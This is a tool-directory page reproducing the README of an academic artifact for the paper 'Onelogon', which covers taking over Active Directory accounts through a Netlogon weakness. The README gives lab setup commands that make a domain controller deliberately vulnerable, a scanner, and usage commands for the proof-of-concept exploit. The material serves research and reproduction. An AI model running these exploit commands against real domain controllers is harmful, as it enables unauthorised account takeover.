Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
onelogon — Code and data for our paper "Onelogon: Taking over Active Directory Accounts via Netlogon" (WOOT’26). | Kitploit
Tools/GitHubGitHub/rub-softsec/onelogon
Vulnerability ScannersVulnerability AnalysisExploitationNetwork SecurityPenetration TestingAuthenticationPapers & Research
GitHubrub-softsec/onelogon

onelogon

Code and data for our paper "Onelogon: Taking over Active Directory Accounts via Netlogon" (WOOT’26).

View Repository
11821828 days agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Onelogon: Taking over Active Directory Accounts via Netlogon

This repository contains code and data accompanying our paper Onelogon: Taking over Active Directory Accounts via Netlogon (WOOT'26).

  1. Context
  2. How to Cite
  3. Artifact Structure and Setup
  4. Setting Up a Test Environment
  5. Scanning for Vulnerable Setups
  6. Exploitation
  7. Reproducing the Measurements

Context

The vulnerability outlined in our paper attacks a weakness in the 2020 cryptographic patch for the Zerologon vulnerability. Accounts listed in a group policy intended to allow support for legacy setups that do not support Netlogon signing and sealing are vulnerable to this attack. A detailed description of the vulnerability, the expected full attack chain, and possible mitigations can be found in the paper.

How to Cite

@inproceedings{woot2026-onelogon,
  title     = {{Onelogon: Taking over Active Directory Accounts via Netlogon}},
  author    = {Neff, Alexander and Holl, Tobias and Borgolte, Kevin},
  booktitle = {Proceedings of the 20th USENIX WOOT Conference on Offensive Technologies},
  date      = {2026-08},
  editor    = {Bianchi, Antonio and Classen, Jiska},
  location  = {Baltimore, MD, USA},
  publisher = {USENIX Association}
}

Artifact Structure and Setup

The artifact consists of a Python poetry project for the scanner and exploits.

To run the scripts provided with the artifact, install Python (3.12 or later) and either poetry (instructions) or uv (instructions). For simplicity, we list the commands assuming that you are using poetry; should you choose to use uv, simply replace any mention of poetry with uv.

Any commands in this document should be run in the artifact root directory (where this README is).

If using poetry, run poetry install to install all dependencies.

Setting Up a Test Environment

To reproduce the results of the paper, you can set up a Domain Controller using a version of Windows Server with Zerologon fixed (we have verified the exploit against both the 2019 and 2025 versions).

To set up the Domain Controller on a new installation of Windows Server 2025, run the following commands:

# Update system and rename computer to "DC"
Install-Module -Name PSWindowsUpdate -Force
Install-WindowsUpdate -MicrosoftUpdate -AcceptAll
Rename-Computer -NewName "DC" -Restart

# Set up the domain (as "onelogon.local")
Install-WindowsFeature AD-Domain-Services -IncludeManagementTools
Install-ADDSForest -DomainName "onelogon.local"

# Disable Administrator password expiry to keep the VM usable
Set-ADUser -Identity "Administrator" -PasswordNeverExpires $true

The vulnerability applies to any account listed in the DACL in the Domain Controller: Allow vulnerable Netlogon secure channel connections group policy object or the corresponding registry key:
HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\VulnerableChannelAllowList

You can manually configure these parameters on the Domain Controller (remember to run gpupdate /force if you update the GPO entry), or run the following command to add all accounts to the DACL in the registry key:

Set-GPRegistryValue -Name "Default Domain Controllers Policy" `
                    -Key "HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters" `
                    -ValueName "VulnerableChannelAllowList" `
                    -Type String `
                    -Value "O:BAG:BAD:(A;;RC;;;WD)" # Everyone

Scanning for Vulnerable Setups

To determine which accounts a Domain Controller lists in its VulnerableChannelAllowList, we provide a scanner that parses the registry hive and GPO volume share of the Domain Controller. Note that accessing the registry for this scan requires Domain Administrator privileges (the exploit, of course, does not).

# Use the specified username and password to scan the target DC.
poetry run scan --dc-ip <IP of target DC> --username <username> --password <password>

# Specify `--help` to get additional usage instructions.
poetry run scan --help

A positive scan result (there are vulnerable accounts on the Domain Controller) will reflect the security descriptor containing the vulnerable accounts (in Microsoft's Security Descriptor Definition Language):

~$ poetry run scan --dc-ip 192.168.108.244 -u Administrator -p Xb52RLIiL5k2BhMC
[+] Found 1 matching policies in SYSVOL Share.
[+] Found vulnerable channel allow list in policy '{6AC1786C-016F-11D2-945F-00C04fB984F9}':
    'O:BAG:BAD:(A;;RC;;;BA)(A;;RC;;;S-1-5-21-1725695585-1077004420-3792776154-1000)'
[+] Found VulnerableChannelAllowList registry configuration:
    O:BAG:BAD:(A;;RC;;;BA)(A;;RC;;;S-1-5-21-1725695585-1077004420-3792776154-1000)

A negative result (the target DC is not vulnerable) will instead look like this:

~$ poetry run scan --dc-ip 192.168.108.244 -u Administrator -p Xb52RLIiL5k2BhMC
[-] No matching policies found in SYSVOL Share.
[-] Error while querying registry: RRP SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND
    - The system cannot find the file specified.

Exploitation

To run the proof-of-concept exploit against a target Domain Controller, select a vulnerable account first. You will need the Domain Controller's IP address, its host name, and the name of the vulnerable account.

In our example setup, the vulnerable Domain Controller is named DC. Its machine account (DC$) is included in the GPO policy and therefore vulnerable to Onelogon.

# Run the meet-in-the-middle attack (Section 4.5 of the paper)
poetry run onelogon --dc-ip <IP of target DC> --dc-name <Name of target DC> \
                    --username <Target account name>

# Run the 24-bit brute-force with a computer account (Section 4.4 of the paper)
poetry run onelogon --dc-ip <IP of target DC> --dc-name <Name of target DC> \
                    --username <Target account name> \
                    --comp-username <Computer account> --comp-pass <Computer account password>

# Run the (slow) 32-bit brute-force with a computer account
poetry run onelogon --naive --dc-ip <IP of target DC> --dc-name <Name of target DC> \
                    --username <Target account name> \
                    --comp-username <Computer account> --comp-pass <Computer account password>

# Run the (very slow) 32-bit brute-force without a computer account
poetry run onelogon --naive --dc-ip <IP of target DC> --dc-name <Name of target DC> \
                    --username <Target account name>
Successful exploit output

As an illustration, we provide the output of a successful run of the meet-in-the-middle attack against a test environment:

Download Tool